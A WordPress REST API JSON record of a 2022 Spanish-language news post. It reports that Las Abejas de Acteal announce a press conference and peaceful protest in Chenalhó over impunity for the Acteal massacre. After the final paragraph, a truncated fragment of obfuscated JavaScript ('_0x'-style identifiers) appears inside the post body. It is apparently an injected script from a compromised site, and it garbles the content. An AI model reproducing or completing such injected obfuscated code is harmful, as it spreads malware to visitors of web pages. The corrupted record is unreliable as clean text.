{"id":6490,"date":"2022-11-09T04:29:36","date_gmt":"2022-11-09T04:29:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6490"},"modified":"2022-11-09T04:29:36","modified_gmt":"2022-11-09T04:29:36","slug":"anuncian-las-abejas-de-acteal-manifestacion-pacific-a-en-chenalho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6490","title":{"rendered":"Anuncian Las Abejas de Acteal manifestaci\u00f3n pacific a en Chenalh\u00f3"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-1024x683.jpeg\" alt=\"\" class=\"wp-image-6492\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-1024x683.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-1536x1024.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/1667968019144__MG_0477-1-2048x1365.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Con el Objetivo de denunciar p\u00fablicamente que, a 25 a\u00f1os de impunidad de la Masacre de Acteal, los partidistas de varios parajes del municipio oficial de Chenalh\u00f3 en connivencia con su ayuntamiento violan en flagrancia nuestros derechos humanos y la construcci\u00f3n de nuestra autonom\u00eda, las Abejas de Acteal, anuncian conferencia de Prensa.<\/p>\n\n\n\n<p>En un comunicado enviado por el Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas, indican que la cita es el pr\u00f3ximo 10 de noviembre a las 10 de la ma\u00f1ana en el parque Central de la cabecera municipal de Chenalh\u00f3, a donde acudir\u00e1n miembros de la Organizaci\u00f3n Sociedad Civil Las Abejas de Acteal.<\/p>\n\n\n\n<p>La organizaci\u00f3n de la Sociedad Civil Las Abejas, es un grupo aut\u00f3nomo en resistencia que lucha pac\u00edficamente para reivindicar sus derechos, construir su autonom\u00eda y para defender sus tierras y territorios. Las Abejas tienen Sede en la comunidad de Acteal, Chenalh\u00f3 y abarca 4 municipios de los Altos de Chiapas, la mayor\u00eda hablantes de la lengua maya tsotsil y una parte maya tseltal.<\/p>\n\n\n\n<p>Durante su camino, han dado testimonio de paz, justicia, libertad, y tambi\u00e9n de denuncia y protesta. Ha hecho presencia en diferentes lugares del pa\u00eds y del extranjero, buscando que su acci\u00f3n aporte algo para la causa de los dem\u00e1s pueblos organizados y tambi\u00e9n con el fin de articular esfuerzos por el objetivo com\u00fan: La construcci\u00f3n del Lekil Kuxlejal (buen vivir).<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Con el Objetivo de denunciar p\u00fablicamente que, a 25 a\u00f1os de impunidad de la Masacre de Acteal, los partidistas de varios parajes del municipio oficial de Chenalh\u00f3 en connivencia con su ayuntamiento violan en flagrancia nuestros derechos humanos y la construcci\u00f3n de nuestra autonom\u00eda, las Abejas de Acteal, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6492,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6490","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6490","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6490"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6490\/revisions"}],"predecessor-version":[{"id":6493,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6490\/revisions\/6493"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6492"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6490"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6490"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6490"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}